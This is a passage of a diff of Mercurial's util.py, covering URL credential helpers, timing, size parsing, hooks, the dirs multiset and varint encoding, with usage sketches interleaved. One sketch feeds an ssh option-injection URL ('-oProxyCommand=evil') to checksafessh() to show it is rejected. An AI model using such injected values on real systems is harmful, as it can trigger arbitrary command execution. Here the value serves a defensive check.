3295 3295 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3296 3296 )
3297 3297
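# A small sketch of checksafessh(); the hostile URL is a hypothetical
# instance of the option-injection pattern described in the docstring.
# Note the path is unquoted first, so a %2D-encoded dash does not evade
# the check.
from mercurial import error, util

util.checksafessh(b'ssh://example.com/repo')  # benign, returns None
try:
    util.checksafessh(b'ssh://-oProxyCommand=evil/repo')
except error.Abort:
    pass  # ssh would parse the leading '-' as an option, so we abort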
3298 3298
3299 3299 def hidepassword(u):
3300 3300 '''hide user credential in a url string'''
3301 3301 u = url(u)
3302 3302 if u.passwd:
3303 3303 u.passwd = b'***'
3304 3304 return bytes(u)
3305 3305
3306 3306
3307 3307 def removeauth(u):
3308 3308 '''remove all authentication information from a url string'''
3309 3309 u = url(u)
3310 3310 u.user = u.passwd = None
3311 3311 return bytes(u)
3312 3312
3313 3313
3314 3314 timecount = unitcountfn(
3315 3315 (1, 1e3, _(b'%.0f s')),
3316 3316 (100, 1, _(b'%.1f s')),
3317 3317 (10, 1, _(b'%.2f s')),
3318 3318 (1, 1, _(b'%.3f s')),
3319 3319 (100, 0.001, _(b'%.1f ms')),
3320 3320 (10, 0.001, _(b'%.2f ms')),
3321 3321 (1, 0.001, _(b'%.3f ms')),
3322 3322 (100, 0.000001, _(b'%.1f us')),
3323 3323 (10, 0.000001, _(b'%.2f us')),
3324 3324 (1, 0.000001, _(b'%.3f us')),
3325 3325 (100, 0.000000001, _(b'%.1f ns')),
3326 3326 (10, 0.000000001, _(b'%.2f ns')),
3327 3327 (1, 0.000000001, _(b'%.3f ns')),
3328 3328 )
3329 3329
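# Illustrative calls to timecount(); this assumes unitcountfn (defined
# earlier in this module, not shown here) picks the first row whose
# threshold the value meets, so the expected strings are a sketch.
from mercurial import util

print(util.timecount(2.5))     # expected: '2.500 s'  (the (1, 1) row)
print(util.timecount(0.0012))  # expected: '1.200 ms' (the (1, 0.001) row)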
3330 3330
3331 3331 @attr.s
3332 3332 class timedcmstats(object):
3333 3333 """Stats information produced by the timedcm context manager on entering."""
3334 3334
3335 3335 # the starting value of the timer as a float (meaning and resolution are
3336 3336 # platform dependent, see util.timer)
3337 3337 start = attr.ib(default=attr.Factory(lambda: timer()))
3338 3338 # the number of seconds as a floating point value; starts at 0, updated when
3339 3339 # the context is exited.
3340 3340 elapsed = attr.ib(default=0)
3341 3341 # the number of nested timedcm context managers.
3342 3342 level = attr.ib(default=1)
3343 3343
3344 3344 def __bytes__(self):
3345 3345 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3346 3346
3347 3347 __str__ = encoding.strmethod(__bytes__)
3348 3348
3349 3349
3350 3350 @contextlib.contextmanager
3351 3351 def timedcm(whencefmt, *whenceargs):
3352 3352 """A context manager that produces timing information for a given context.
3353 3353
3354 3354 On entering, a timedcmstats instance is produced.
3355 3355
3356 3356 This context manager is reentrant.
3357 3357
3358 3358 """
3359 3359 # track nested context managers
3360 3360 timedcm._nested += 1
3361 3361 timing_stats = timedcmstats(level=timedcm._nested)
3362 3362 try:
3363 3363 with tracing.log(whencefmt, *whenceargs):
3364 3364 yield timing_stats
3365 3365 finally:
3366 3366 timing_stats.elapsed = timer() - timing_stats.start
3367 3367 timedcm._nested -= 1
3368 3368
3369 3369
3370 3370 timedcm._nested = 0
3371 3371
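# A minimal usage sketch for timedcm(); the label is only forwarded to
# tracing.log, so any bytes format string works here.
from mercurial import util

with util.timedcm(b'demo') as stats:
    sum(range(1000000))
# elapsed is filled in when the block exits; bytes() renders it via
# timecount, e.g. b'12.3 ms'.
print(stats.elapsed, bytes(stats))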
3372 3372
3373 3373 def timed(func):
3374 3374 '''Report the execution time of a function call to stderr.
3375 3375
3376 3376 During development, use as a decorator when you need to measure
3377 3377 the cost of a function, e.g. as follows:
3378 3378
3379 3379 @util.timed
3380 3380 def foo(a, b, c):
3381 3381 pass
3382 3382 '''
3383 3383
3384 3384 def wrapper(*args, **kwargs):
3385 3385 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3386 3386 result = func(*args, **kwargs)
3387 3387 stderr = procutil.stderr
3388 3388 stderr.write(
3389 3389 b'%s%s: %s\n'
3390 3390 % (
3391 3391 b' ' * time_stats.level * 2,
3392 3392 pycompat.bytestr(func.__name__),
3393 3393 time_stats,
3394 3394 )
3395 3395 )
3396 3396 return result
3397 3397
3398 3398 return wrapper
3399 3399
3400 3400
3401 3401 _sizeunits = (
3402 3402 (b'm', 2 ** 20),
3403 3403 (b'k', 2 ** 10),
3404 3404 (b'g', 2 ** 30),
3405 3405 (b'kb', 2 ** 10),
3406 3406 (b'mb', 2 ** 20),
3407 3407 (b'gb', 2 ** 30),
3408 3408 (b'b', 1),
3409 3409 )
3410 3410
3411 3411
3412 3412 def sizetoint(s):
3413 3413 '''Convert a space specifier to a byte count.
3414 3414
3415 3415 >>> sizetoint(b'30')
3416 3416 30
3417 3417 >>> sizetoint(b'2.2kb')
3418 3418 2252
3419 3419 >>> sizetoint(b'6M')
3420 3420 6291456
3421 3421 '''
3422 3422 t = s.strip().lower()
3423 3423 try:
3424 3424 for k, u in _sizeunits:
3425 3425 if t.endswith(k):
3426 3426 return int(float(t[: -len(k)]) * u)
3427 3427 return int(t)
3428 3428 except ValueError:
3429 3429 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3430 3430
3431 3431
3432 3432 class hooks(object):
3433 3433 '''A collection of hook functions that can be used to extend a
3434 3434 function's behavior. Hooks are called in lexicographic order,
3435 3435 based on the names of their sources.'''
3436 3436
3437 3437 def __init__(self):
3438 3438 self._hooks = []
3439 3439
3440 3440 def add(self, source, hook):
3441 3441 self._hooks.append((source, hook))
3442 3442
3443 3443 def __call__(self, *args):
3444 3444 self._hooks.sort(key=lambda x: x[0])
3445 3445 results = []
3446 3446 for source, hook in self._hooks:
3447 3447 results.append(hook(*args))
3448 3448 return results
3449 3449
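# A quick sketch of the hooks helper: hooks run sorted by source name,
# and calling the collection returns each hook's result in that order.
from mercurial import util

h = util.hooks()
h.add(b'zebra-ext', lambda x: x * 2)
h.add(b'alpha-ext', lambda x: x + 1)
assert h(10) == [11, 20]  # b'alpha-ext' sorts before b'zebra-ext'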
3450 3450
3451 3451 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3452 3452 '''Yields lines for a nicely formatted stacktrace.
3453 3453 Skips the last 'skip' entries, then returns the last 'depth' entries.
3454 3454 Each file+linenumber is formatted according to fileline.
3455 3455 Each line is formatted according to line.
3456 3456 If line is None, it yields:
3457 3457 length of longest filepath+line number,
3458 3458 filepath+linenumber,
3459 3459 function
3460 3460
3461 3461 Not to be used in production code, but very convenient while developing.
3462 3462 '''
3463 3463 entries = [
3464 3464 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3465 3465 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3466 3466 ][-depth:]
3467 3467 if entries:
3468 3468 fnmax = max(len(entry[0]) for entry in entries)
3469 3469 for fnln, func in entries:
3470 3470 if line is None:
3471 3471 yield (fnmax, fnln, func)
3472 3472 else:
3473 3473 yield line % (fnmax, fnln, func)
3474 3474
3475 3475
3476 3476 def debugstacktrace(
3477 3477 msg=b'stacktrace',
3478 3478 skip=0,
3479 3479 f=procutil.stderr,
3480 3480 otherf=procutil.stdout,
3481 3481 depth=0,
3482 3482 ):
3483 3483 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3484 3484 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3485 3485 By default it will flush stdout first.
3486 3486 It can be used everywhere and intentionally does not require a ui object.
3487 3487 Not to be used in production code, but very convenient while developing.
3488 3488 '''
3489 3489 if otherf:
3490 3490 otherf.flush()
3491 3491 f.write(b'%s at:\n' % msg.rstrip())
3492 3492 for line in getstackframes(skip + 1, depth=depth):
3493 3493 f.write(line)
3494 3494 f.flush()
3495 3495
3496 3496
3497 3497 class dirs(object):
3498 3498 '''a multiset of directory names from a dirstate or manifest'''
3499 3499
3500 3500 def __init__(self, map, skip=None):
3501 3501 self._dirs = {}
3502 3502 addpath = self.addpath
3503 3503 if isinstance(map, dict) and skip is not None:
3504 3504 for f, s in pycompat.iteritems(map):
3505 3505 if s[0] != skip:
3506 3506 addpath(f)
3507 3507 elif skip is not None:
3508 3508 raise error.ProgrammingError(
3509 3509 b"skip character is only supported with a dict source"
3510 3510 )
3511 3511 else:
3512 3512 for f in map:
3513 3513 addpath(f)
3514 3514
3515 3515 def addpath(self, path):
3516 3516 dirs = self._dirs
3517 3517 for base in finddirs(path):
3518 if base.endswith(b'/'):
3519 raise ValueError(
3520 "found invalid consecutive slashes in path: %r" % base
3521 )
3518 3522 if base in dirs:
3519 3523 dirs[base] += 1
3520 3524 return
3521 3525 dirs[base] = 1
3522 3526
3523 3527 def delpath(self, path):
3524 3528 dirs = self._dirs
3525 3529 for base in finddirs(path):
3526 3530 if dirs[base] > 1:
3527 3531 dirs[base] -= 1
3528 3532 return
3529 3533 del dirs[base]
3530 3534
3531 3535 def __iter__(self):
3532 3536 return iter(self._dirs)
3533 3537
3534 3538 def __contains__(self, d):
3535 3539 return d in self._dirs
3536 3540
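# A usage sketch for the dirs multiset above (the C and Rust variants
# assigned below replace the pure-Python class when available, with the
# same observable behaviour).
from mercurial import util

d = util.dirs({})
d.addpath(b'a/b/c')
d.addpath(b'a/b/d')
assert b'a/b' in d and b'a' in d and b'' in d
d.delpath(b'a/b/c')
assert b'a/b' in d      # still referenced by a/b/d
d.delpath(b'a/b/d')
assert b'a/b' not in d  # the count dropped to zero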
3537 3541
3538 3542 if safehasattr(parsers, 'dirs'):
3539 3543 dirs = parsers.dirs
3540 3544
3541 3545 if rustdirs is not None:
3542 3546 dirs = rustdirs
3543 3547
3544 3548
3545 3549 def finddirs(path):
3546 3550 pos = path.rfind(b'/')
3547 3551 while pos != -1:
3548 3552 yield path[:pos]
3549 3553 pos = path.rfind(b'/', 0, pos)
3550 3554 yield b''
3551 3555
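# A quick sketch of finddirs(): ancestors are yielded deepest first,
# ending with b'' for the repository root.
from mercurial import util

assert list(util.finddirs(b'a/b/c')) == [b'a/b', b'a', b'']
assert list(util.finddirs(b'top')) == [b'']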
3552 3556
3553 3557 # convenient shortcut
3554 3558 dst = debugstacktrace
3555 3559
3556 3560
3557 3561 def safename(f, tag, ctx, others=None):
3558 3562 """
3559 3563 Generate a name that is safe to rename f to in the given context.
3560 3564
3561 3565 f: filename to rename
3562 3566 tag: a string tag that will be included in the new name
3563 3567 ctx: a context, in which the new name must not exist
3564 3568 others: a set of other filenames that the new name must not be in
3565 3569
3566 3570 Returns a file name of the form oldname~tag[~number] which does not exist
3567 3571 in the provided context and is not in the set of other names.
3568 3572 """
3569 3573 if others is None:
3570 3574 others = set()
3571 3575
3572 3576 fn = b'%s~%s' % (f, tag)
3573 3577 if fn not in ctx and fn not in others:
3574 3578 return fn
3575 3579 for n in itertools.count(1):
3576 3580 fn = b'%s~%s~%s' % (f, tag, n)
3577 3581 if fn not in ctx and fn not in others:
3578 3582 return fn
3579 3583
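# A sketch of safename(); ctx only needs to support the `in` operator,
# so a plain set stands in for a real changectx purely for illustration.
from mercurial import util

taken = {b'foo~bak', b'foo~bak~1'}
assert util.safename(b'foo', b'bak', taken) == b'foo~bak~2'
assert util.safename(b'bar', b'bak', taken) == b'bar~bak'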
3580 3584
3581 3585 def readexactly(stream, n):
3582 3586 '''read n bytes from stream.read and abort if less was available'''
3583 3587 s = stream.read(n)
3584 3588 if len(s) < n:
3585 3589 raise error.Abort(
3586 3590 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3587 3591 % (len(s), n)
3588 3592 )
3589 3593 return s
3590 3594
3591 3595
3592 3596 def uvarintencode(value):
3593 3597 """Encode an unsigned integer value to a varint.
3594 3598
3595 3599 A varint is a variable length integer of 1 or more bytes. Each byte
3596 3600 except the last has the most significant bit set. The lower 7 bits of
3597 3601 each byte store the value's binary representation, least significant group
3598 3602 first.
3599 3603
3600 3604 >>> uvarintencode(0)
3601 3605 '\\x00'
3602 3606 >>> uvarintencode(1)
3603 3607 '\\x01'
3604 3608 >>> uvarintencode(127)
3605 3609 '\\x7f'
3606 3610 >>> uvarintencode(1337)
3607 3611 '\\xb9\\n'
3608 3612 >>> uvarintencode(65536)
3609 3613 '\\x80\\x80\\x04'
3610 3614 >>> uvarintencode(-1)
3611 3615 Traceback (most recent call last):
3612 3616 ...
3613 3617 ProgrammingError: negative value for uvarint: -1
3614 3618 """
3615 3619 if value < 0:
3616 3620 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3617 3621 bits = value & 0x7F
3618 3622 value >>= 7
3619 3623 bytes = []
3620 3624 while value:
3621 3625 bytes.append(pycompat.bytechr(0x80 | bits))
3622 3626 bits = value & 0x7F
3623 3627 value >>= 7
3624 3628 bytes.append(pycompat.bytechr(bits))
3625 3629
3626 3630 return b''.join(bytes)
3627 3631
3628 3632
3629 3633 def uvarintdecodestream(fh):
3630 3634 """Decode an unsigned variable length integer from a stream.
3631 3635
3632 3636 The passed argument is anything that has a ``.read(N)`` method.
3633 3637
3634 3638 >>> try:
3635 3639 ... from StringIO import StringIO as BytesIO
3636 3640 ... except ImportError:
3637 3641 ... from io import BytesIO
3638 3642 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3639 3643 0
3640 3644 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3641 3645 1
3642 3646 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3643 3647 127
3644 3648 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3645 3649 1337
3646 3650 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3647 3651 65536
3648 3652 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3649 3653 Traceback (most recent call last):
3650 3654 ...
3651 3655 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3652 3656 """
3653 3657 result = 0
3654 3658 shift = 0
3655 3659 while True:
3656 3660 byte = ord(readexactly(fh, 1))
3657 3661 result |= (byte & 0x7F) << shift
3658 3662 if not (byte & 0x80):
3659 3663 return result
3660 3664 shift += 7